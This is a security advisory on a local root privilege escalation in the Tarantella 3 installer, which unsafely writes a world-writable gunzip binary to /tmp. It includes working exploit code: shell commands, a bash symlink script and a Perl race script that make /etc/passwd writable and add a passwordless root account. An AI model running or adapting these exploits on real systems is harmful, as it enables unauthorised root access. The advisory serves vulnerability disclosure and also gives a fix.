|
COMMAND Tarantella local root compromise at installation time via bad tmp practice SYSTEMS AFFECTED Tarantella 3 PROBLEM \"Larry W. Cashdollar\" in \"Vapid Labs\" [http://vapid.dhs.org/] advisory says : The installation script provided with tarentella handles utility packages during installation insecurely. A root owned binary \"gunzip\" is created in /tmp with world writeable permissions, the pid is appended to the filename. TMP_GUNZIP=$TMPDIR/gunzip$$ $ ls -l /tmp/gunzip16152 - -rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152 gunzip is extracted: extract gunzip > \"$TMP_GUNZIP\" 2>>$SHXLOGFILE extract gunzip | uncompress > \"$TMP_GUNZIP\" 2>>$SHXLOGFILE The permissions of gunzip are changed to rwx for all: chmod 777 $TMP_GUNZIP >/dev/null 2>&1 The binary is used during installation: extract $efilename | $TMP_GUNZIP -q > \"$efilename\" Exploit ======= There is a race condition between when gunzip is extracted and used during installation. At which time a malicious local user could inject code to compromise the system quickly. $ echo \"#!/bin/sh\" > /tmp/test.sh $ echo \"chmod 777 /etc/passwd\" >> /tmp/test.sh $ cat /tmp/test.sh > /tmp/gunzip16152 I was able to change the permissions of /etc/passwd to 777 by performing the above as an unpriviledged user. In a script : #!/bin/bash #Larry W. Cashdollar lwc@vapid.dhs.org #http://vapid.dhs.org #Tarantella Enterprise 3 symlink local root Installation exploit #For educational purposes only. #tested on Linux. run and wait. echo \"Creating symlink.\" /bin/ln -s /etc/passwd /tmp/spinning echo \"Waiting for tarantella installation.\" while true do echo -n . if [ -w /etc/passwd ] then echo \"tarexp::0:0:Tarantella Exploit:/:/bin/bash\" >> /etc/passwd su - tarexp exit fi done -Also- #!/usr/bin/perl -w #Another Exploit for tarantella enterprise 3 installation. #Larry Cashdollar lwc@vapid.dhs.org 2/08/2002 #Exploits gunzip$$ binary being created in /tmp with perm 777 #http://online.securityfocus.com/bid/3966 #Experimental ext3 kernel mods for preventing/researching race conditions. #http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html use strict; `cat << -EOF- > root.sh #!/bin/sh chmod 777 /etc/passwd echo \"tarexp::0:0:Tarantella Exploit:/:/bin/bash\" >> /etc/passwd -EOF-`; my $OUT = \'\'; while(!$OUT) { $OUT = `ps -ax |grep gunzip |grep -v grep`; print \"Found $OUT\\n\"; } my @args = split(\' \',$OUT); # Do this with one copy operation. This will break installation of tarantella. # should test for -w on /etc/passwd stop and su - tarexp. while(1) { `cp root.sh $args[4]`; } SOLUTION Perhaps create a directory in /tmp or /var/tmp and use that directory as a work place? umask 077 mkdir /tmp/workdir Update (05 April 2002) ====== Tarantella addressed these issues in a security bulletin: http://www.tarantella.com/security/bulletin-04.html